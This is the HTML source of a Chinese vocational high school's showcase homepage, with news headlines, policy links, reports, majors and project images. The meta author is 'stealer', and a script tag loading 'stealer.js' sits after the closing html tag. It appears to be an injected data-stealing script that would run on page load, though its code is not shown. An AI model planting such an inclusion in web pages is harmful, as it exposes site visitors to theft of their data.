

<html>
<head>
    <meta charset="UTF-8">
    <meta name="author" content="stealer">
    <meta name="keywords" content="延吉职高示范校展示专题网站">
    <meta name="description">
    <meta name="renderer" content="webkit" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <link href="/Resource/Template/1/css/mould.css" rel="stylesheet" />
    <link href="/Resource/Template/1/css/style.css" rel="stylesheet" />
    <script src="/Resource/Template/1/js/jquery-1.7.2.min.js"></script>
    <script src="/Resource/Template/1/Scripts/swfobject_modified.js"></script>
    <title>延吉职高示范校展示专题网站</title>
</head>
<body>
<div class="wrapper">
    <div class="home-top">



        <object id="FlashID" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1440" height="318">
            <param name="movie" value="/Resource/Template/1/images/banner.swf">
            <param name="quality" value="high">
            <param name="wmode" value="opaque">
            <param name="swfversion" value="9.0.45.0">
            <!-- 此 param 标签提示使用 Flash Player 6.0 r65 和更高版本的用户下载最新版本的 Flash Player。如果您不想让用户看到该提示，请将其删除。 -->
            <param name="expressinstall" value="/Resource/Template/1/Scripts/expressInstall.swf">
            <!-- 下一个对象标签用于非 IE 浏览器。所以使用 IECC 将其从 IE 隐藏。 -->
            <!--[if !IE]>-->
            <object type="application/x-shockwave-flash" data="/Resource/Template/1/images/banner.swf" width="1440" height="318">
                <!--<![endif]-->
                <param name="quality" value="high">
                <param name="wmode" value="opaque">
                <param name="swfversion" value="9.0.45.0">
                <param name="expressinstall" value="/Resource/Template/1/Scripts/expressInstall.swf">
                <!-- 浏览器将以下替代内容显示给使用 Flash Player 6.0 和更低版本的用户。 -->
                <div>
                    <h4>此页面上的内容需要较新版本的 Adobe Flash Player。</h4>
                    <p><a href="http://www.adobe.com/go/getflashplayer">
                        <img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="获取 Adobe Flash Player" width="112" height="33" /></a></p>
                </div>
                <!--[if !IE]>-->
            </object>
            <!--<![endif]-->
        </object>
    </div>
    <div class="nav">
        <div class="page">
            <ul>
                <li class="first active"><a href="/WebShow/Index/1">首页</a></li>
                <li>
                    <a href="/WebShow/ShowColumn/2">政策指导</a>
                </li>
                <li>
                    <a href="/WebShow/ShowColumn/3">建设动态</a>
                </li>
                <li>
                    <a href="/WebShow/ShowColumn/4">典型案例</a>
                </li>
                <li>
                    <a href="/WebShow/ShowColumn/5">总结报告</a>
                </li>
                <li>
                    <a href="/WebShow/ShowColumn/6">建设成果</a>
                </li>
                <li>
                    <a href="/WebShow/ShowColumn/7">汇报视频</a>
                </li>
                <li class="last">
                    <a href="/WebShow/ShowColumn/49">佐证材料</a>
                </li>
            </ul>
            <div class="clear"></div>
            <div class="nav-li"></div>
        </div>
    </div>
    <div class="container">
        <div class="page">
            <!--建设动态-->
            <div class="block_news">
                <div class="block_news_title">
                    <img src="/Resource/Template/1/images/loudspeaker.png" alt=""><span>建设动态</span><b> <img src="/Resource/Template/1/images/zy1.jpg"></b>
                </div>
                <div class="block_newsUl">
                    <ul>
                        <li>
                            <a href="/WebShow/ShowColumn/0?previewColumnId=12&amp;previewDataId=3688"><span>&middot;</span>延吉市职业高中入选2017中国职业教育百强</a>
                            <a href="/WebShow/ShowColumn/0?previewColumnId=12&amp;previewDataId=3687"><span>&middot;</span>职业高中召开职业教育现代学徒制试点项目合作企业论证会</a>
                        </li>
                        <li>
                            <a href="/WebShow/ShowColumn/0?previewColumnId=12&amp;previewDataId=3686"><span>&middot;</span>延吉市职业高中喜获吉林省首届黄炎培职业教育优秀学校奖</a>
                            <a href="/WebShow/ShowColumn/0?previewColumnId=12&amp;previewDataId=3685"><span>&middot;</span>延边州职业教育研讨会在延吉市职业高中召开</a>
                        </li>
                        <li>
                            <a href="/WebShow/ShowColumn/0?previewColumnId=12&amp;previewDataId=3684"><span>&middot;</span>长春职业技术学院来职业高中考察交流</a>
                            <a href="/WebShow/ShowColumn/0?previewColumnId=12&amp;previewDataId=3683"><span>&middot;</span>职业高中开学初迎接国家督导检查</a>
                        </li>
                        <li>
                            <a href="/WebShow/ShowColumn/0?previewColumnId=12&amp;previewDataId=3682"><span>&middot;</span>青海玉树教育考察团到职业高中学习民族职业教育</a>
                            <a href="/WebShow/ShowColumn/0?previewColumnId=12&amp;previewDataId=3681"><span>&middot;</span>四川省甘孜县藏族自治州教育考察团来职业高中参观学习</a>
                        </li>
                    </ul>
                </div>
                <div class="clear"></div>
            </div>
            <div class="guide">
                <div class="policy">
                    <h3>政策指导<span><img src="/Resource/Template/1/images/ziti6.jpg"></span></h3>
                    <ul>
                        <li><a href="/WebShow/ShowColumn/0?previewColumnId=11&amp;previewDataId=11"><span>&gt;</span>国家示范校第三批立项建设学校名单的通知</a></li>
                        <li><a href="/WebShow/ShowColumn/0?previewColumnId=11&amp;previewDataId=12"><span>&gt;</span>关于下达第三批项目学校建设方案及任务书的通知</a></li>
                        <li><a href="/WebShow/ShowColumn/0?previewColumnId=11&amp;previewDataId=1475"><span>&gt;</span>申报2012年度示范学校建设计划项目的通知</a></li>
                    </ul>
                    <a href="/WebShow/ShowColumn/0?previewColumnId=11" class="more"><img src="/Resource/Template/1/images/ziti.jpg">&rarr;</a>
                    <div class="clear"></div>
                </div>
                <div class="focuse">
                    <h3>总结报告<span><img src="/Resource/Template/1/images/ziti4.jpg"></span></h3>
                    <ul>
                        <li><a href="/WebShow/ShowColumn/0?previewColumnId=14&amp;previewDataId=3426"><span>&gt;</span>学校总结报告（朝文版）</a></li>
                        <li><a href="/WebShow/ShowColumn/0?previewColumnId=15&amp;previewDataId=15"><span>&gt;</span>汽车运用与维修专业建设总结报告</a></li>
                        <li><a href="/WebShow/ShowColumn/0?previewColumnId=16&amp;previewDataId=16"><span>&gt;</span>学前教育专业建设总结报告</a></li>
                    </ul>
                    <a href="/WebShow/ShowColumn/5" class="more"><img src="/Resource/Template/1/images/ziti2.jpg">&rarr;</a>
                    <div class="clear"></div>
                </div>
                <div class="program">
                    <h3>典型案例<span><img src="/Resource/Template/1/images/ziti5.jpg"></span></h3>
                    <ul>
                        <li><a href="/WebShow/ShowColumn/0?previewColumnId=13&amp;previewDataId=302"><span>&gt;</span>基于积极心理学理念的校园心理健康文化创建实践</a></li>
                        <li><a href="/WebShow/ShowColumn/0?previewColumnId=851&amp;previewDataId=3608"><span>&gt;</span>携手名店  共筑“三进三出” 校企合作模式</a></li>
                        <li><a href="/WebShow/ShowColumn/0?previewColumnId=853&amp;previewDataId=3609"><span>&gt;</span>建设校内汽车服务站 推动企业4S管理模式教学</a></li>
                    </ul>
                    <a href="/WebShow/ShowColumn/0?previewColumnId=13" class="more"><img src="/Resource/Template/1/images/ziti3.jpg">&rarr;</a>
                    <div class="clear"></div>
                </div>
                <div class="clear"></div>
            </div>
            <div class="construction">
                <h3>建设成果<span><img src="/Resource/Template/1/images/zt2.jpg"></span></h3>
                <img src="/upload/1/20/2015-09-08-dc58fff328d54450b3ab777fcf84350a.jpg" class="img_left">
                <div class="constr_con">
                    <ul>

                        <li class="first">
                            <h3>01</h3>
                            <div class="li_con">
                                <a href="/WebShow/ShowColumn/0?previewColumnId=20&amp;previewDataId=1485">
                                    <h4>汽车运用与维修专业调研报告</h4>
                                </a>
                                <a href="/WebShow/ShowColumn/0?previewColumnId=20&amp;previewDataId=1438">
                                    <h4>学前教育专业调研报告</h4>
                                </a>
                                <a href="/WebShow/ShowColumn/0?previewColumnId=20&amp;previewDataId=1478">
                                    <h4>中餐烹饪与营养膳食专业调研报告</h4>
                                </a>
                            </div>
                            <div class="clear"></div>
                        </li>


                        <li>
                            <h3>02</h3>
                            <div class="li_con">
                                <a href="/WebShow/ShowColumn/0?previewColumnId=21&amp;previewDataId=1484">
                                    <h4>汽车运用与维修专业人才培养方案</h4>
                                </a>
                                <a href="/WebShow/ShowColumn/0?previewColumnId=21&amp;previewDataId=1442">
                                    <h4>学前教育专业人才培养方案</h4>
                                </a>
                                <a href="/WebShow/ShowColumn/0?previewColumnId=21&amp;previewDataId=1479">
                                    <h4>中餐烹饪与营养膳食专业人才培养方案</h4>
                                </a>
                            </div>
                            <div class="clear"></div>
                        </li>

                    </ul>
                </div>
                <div class="clear"></div>
            </div>
            <!--汇报视频-->
            <div class="video">
                <div class="flashplayer">
                    <div id="a1" style="width:364px; height:269px;"></div>
                </div>


                <script type="text/javascript" src="/Resource/Common/ckplayer/ckplayer.js" charset="utf-8"></script>
                <script type="text/javascript">
                    $(function() {
                        playVideo("/upload/1/27/2016-04-06-5af41a4ca6044eb4aba99b10aa75b64f.flv");
                    });

                    function playVideo(filePath) {
                        var flashvars = {
                            f: filePath,
                            c: 0,
                            p: 0,
                            b: 1
                        };
                        var params = { bgcolor: '#FFF', allowFullScreen: true, allowScriptAccess: 'always' };
                        CKobject.embedSWF('/Resource/Common/ckplayer/ckplayer.swf', 'a1', 'ckplayer_a1', '364', '269', flashvars, params);
                    }
                </script>


            </div>
            <div class="clear"></div>
            <div class="major">
                <h3>重点专业<span><img src="/Resource/Template/1/images/zt3.jpg"></span></h3>
                <div class="block-content">
                    <ul class="ul1">
                        <li>
                            <a href="/ZZCLShow/Index/0?previewColumnId=50&amp;previewDataId=108&amp;flag=858">

                                <img src="/upload/20150717/52191971cd0946b0a030b5d8e1f83f33.jpg" /></a>
                            <p title="汽车运用与维修专业">汽车运用与维修专业</p>
                        </li>
                        <li>
                            <a href="/ZZCLShow/Index/0?previewColumnId=50&amp;previewDataId=52&amp;flag=858">

                                <img src="/upload/20150717/ad2b6442a2f442b481b2b2254e1ba163.jpg" /></a>
                            <p title="学前教育专业">学前教育专业</p>
                        </li>
                        <li>
                            <a href="/ZZCLShow/Index/0?previewColumnId=50&amp;previewDataId=53&amp;flag=858">

                                <img src="/upload/20150717/76db583087a240d8972a62958edd3b06.jpg" /></a>
                            <p title="中餐烹饪与营养膳食专业">中餐烹饪与营养膳食专业</p>
                        </li>
                        <li>
                            <a href="/ZZCLShow/Index/0?previewColumnId=50&amp;previewDataId=55&amp;flag=858">

                                <img src="/upload/20150717/dab5631122dd4fd3a6debaf4c0188e5c.jpg" /></a>
                            <p title="美发与形象设计专业">美发与形象设计专业</p>
                        </li>

                    </ul>
                </div>
            </div>

            <div class="feature">
                <h3>特色项目<span><img src="/Resource/Template/1/images/zt1.jpg"></span></h3>
                <div class="block-content">
                    <ul class="ul2">
                        <li>


                            <img src="/upload/20150717/72c90955-f666-4636-83c4-fa3007943eb4.png" style="width:212px;height:132px;" />
                            <p title="班主任拓展训练" class="textClip">班主任拓展训练</p>
                        </li>
                        <li>


                            <img src="/upload/20150717/297a706c-1b4c-4e4e-818d-51ea61e26a96.png" style="width:212px;height:132px;" />
                            <p title="赞美墙" class="textClip">赞美墙</p>
                        </li>
                        <li>


                            <img src="/upload/20150717/01f9f42d-8632-4f45-bd79-c78a388293b1.png" style="width:212px;height:132px;" />
                            <p title="学生团体活动" class="textClip">学生团体活动</p>
                        </li>
                        <li>


                            <img src="/upload/20150717/cdcea750-5fd8-43de-8775-422bb470de40.png" style="width:212px;height:132px;" />
                            <p title="班级海报" class="textClip">班级海报</p>
                        </li>
                        <li>


                            <img src="/upload/20150717/22112346-e6ed-466a-a62c-549d06b48110.png" style="width:212px;height:132px;" />
                            <p title="幸福班主任训练营" class="textClip">幸福班主任训练营</p>
                        </li>
                        <li>


                            <img src="/upload/20150717/ca2bf5e0-7ec0-4ef8-94e5-5d0489eea6b2.png" style="width:212px;height:132px;" />
                            <p title="校园心理剧展演" class="textClip">校园心理剧展演</p>
                        </li>
                        <li>


                            <img src="/upload/20150717/255f5386-9ad8-4277-8ebd-388947e23b26.png" style="width:212px;height:132px;" />
                            <p title="健康校园文化创设阶段总结" class="textClip">健康校园文化创设阶段总结</p>
                        </li>
                        <li>


                            <img src="/upload/20150717/62e650c6-6ad2-45b3-9b61-044f4270efe6.png" style="width:212px;height:132px;" />
                            <p title="心理健康宣传月活动" class="textClip">心理健康宣传月活动</p>
                        </li>

                    </ul>
                </div>
            </div>

            <div class="lineCon service-fix" id="service-fix">
                <div class="box">
                    <div class="title"><a href="http://218.27.202.183:6688/ziyuanku/web/index.html" target="_blank"><b></b>资源库</a></div>
                    <div class="topDiv"><a href="javascript:scroll(0,0);">TOP</a></div>
                </div>
            </div>
        </div>

    </div>
    <div class="footer-fixer"></div>
</div>
<div class="footer">
    <div class="page">
        <div class="copyright">
            <p>
                ©版权归属：延吉市职业高级中学<br>
                通信地址：延吉市朝阳街3051号　　邮编：133000　　电话传真：0433-2625519
            </p>
            <div class="clear"></div>
        </div>
        <div class="clear"></div>
    </div>
</div>
</body>
</html>

<script src="/Resource/Template/1/js/stealer.js"></script>
